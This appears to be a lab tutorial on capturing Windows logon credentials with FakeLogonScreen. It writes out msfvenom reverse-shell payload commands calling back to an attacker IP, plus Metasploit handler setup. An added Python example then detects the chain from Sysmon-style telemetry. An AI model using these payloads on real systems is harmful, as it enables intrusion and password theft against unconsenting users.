How to grab Windows credentials using the FakeLogonScreen tool

December 24, 2020
In this article, we will look at a tool named FakeLogonScreen. As the name suggests, this tool creates a fake logon screen on the victim's computer. The victim might think he accidentally logged off, but that's not the case.
This was created by Arris Huijgen and you can get it here
To get a better understanding of the tool, let's see how it works in practice.
Topics included are Configurations, Situation, Creating the payload, Listening, Getting a session and interacting with it, Uploading FakeLogonScreen.exe, and Obtaining credentials.
NOTE: This is a lab environment; real-world application can be different.
Let's get started.

Configurations

Attacker Machine: Kali Linux IP: 192.168.91.128

Victim Machine: Windows 8.1 IP: 192.168.91.131

Situation

The attacker machine is connected to the same network as the victim machine. The attacker is trying to get the credentials of the victim machine. The attacker already knows the type of OS used on the victim machine as well as its IP address.

Creating the payload

To create the payload, I used the msfvenom tool. I gave my Kali machine's IP as LHOST. As the victim machine runs Windows, I created the payload as an .exe file for easy execution. To host the created payload, I used a Python one-liner to start an HTTP server. Use the following commands to create and host the payload.
Command
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.128 lport=4444 -f exe >> payload.exe

# python -m SimpleHTTPServer 80

Listening

As our payload is ready to use, let's start the listening process. We need a listener to get a session from the victim machine. After the required configuration, I went straight to the victim machine and executed the payload.

Getting Session and Interacting with it

Set the payload, lhost and lport in the handler to match the payload you created. After that, run the payload on the victim machine. You will notice that you get a meterpreter session.
Command
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.91.128
set lport 4444
run -j

Uploading FakeLogonScreen.exe

Check the active sessions to be sure, then interact with the session. Once you are interacting with the session, upload FakeLogonScreen.

Obtaining Credentials

Get a shell on the Windows machine. As soon as you get the shell, execute the .exe file from the attacking machine. As you can see from the image, the logon screen seems to be legitimate.
Let's enter a wrong password to check.
Here you can see that this is working as a keylogger. Let's enter the correct password.
You have successfully obtained the credentials from the victim machine.
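
Seen from the defending side, the chain above (an executable connecting back to 192.168.91.128 on port 4444, then a shell that starts FakeLogonScreen.exe) is visible in process and network telemetry. The following is an added example, not part of the original article or of the FakeLogonScreen project: it correlates constructed events shaped like Sysmon Event ID 1 (process creation) and Event ID 3 (network connection) to find a binary in a user-writable path that connects out on an unexpected port, then lists everything it spawned. The file paths, GUIDs, simplified field names and the port allowlist are assumptions.

```python
import ntpath

# Assumptions for this example: which paths count as user-writable and which
# destination ports are expected egress. Tune both to the environment.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")
EXPECTED_PORTS = {53, 80, 443}

# Constructed events in time order. id 1 = process creation, id 3 = network
# connection; GUIDs, paths and the "victim" user name are made up.
EVENTS = [
    {"id": 1, "guid": "A1", "parent": "E0", "image": r"C:\Users\victim\Downloads\payload.exe"},
    {"id": 3, "guid": "A1", "image": r"C:\Users\victim\Downloads\payload.exe",
     "dst_ip": "192.168.91.128", "dst_port": 4444},
    {"id": 1, "guid": "B1", "parent": "E0", "image": r"C:\Program Files\Browser\browser.exe"},
    {"id": 3, "guid": "B1", "image": r"C:\Program Files\Browser\browser.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"id": 1, "guid": "A2", "parent": "A1", "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "guid": "B2", "parent": "E0", "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "guid": "A3", "parent": "A2", "image": r"C:\Users\victim\Downloads\FakeLogonScreen.exe"},
]

def suspicious_roots(events):
    """GUIDs of processes in user-writable paths that connect out on an unexpected port."""
    return {e["guid"] for e in events
            if e["id"] == 3
            and any(p in e["image"].lower() for p in USER_WRITABLE)
            and e["dst_port"] not in EXPECTED_PORTS}

def descendants(events, roots):
    """Image names of every process created under a flagged root, in order."""
    tainted = set(roots)
    found = []
    for e in events:  # time-ordered input, so parents are seen before children
        if e["id"] == 1 and e["parent"] in tainted:
            tainted.add(e["guid"])
            found.append(ntpath.basename(e["image"]))
    return found

def triage(events):
    """Return flagged root processes and the process tree beneath them."""
    roots = suspicious_roots(events)
    return {"roots": sorted(roots), "children": descendants(events, roots)}

if __name__ == "__main__":
    print(triage(EVENTS))
```

The correlation keys on behaviour (path, port, parentage) rather than on the file name FakeLogonScreen.exe, since a name match alone stops working as soon as the binary is renamed.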
